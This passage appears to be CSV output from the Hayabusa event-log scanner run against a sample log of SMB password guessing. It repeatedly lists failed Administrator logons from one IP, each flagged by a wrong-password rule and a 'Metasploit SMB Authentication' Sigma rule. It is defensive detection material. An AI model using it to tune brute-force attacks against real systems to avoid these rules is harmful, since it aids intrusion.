Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 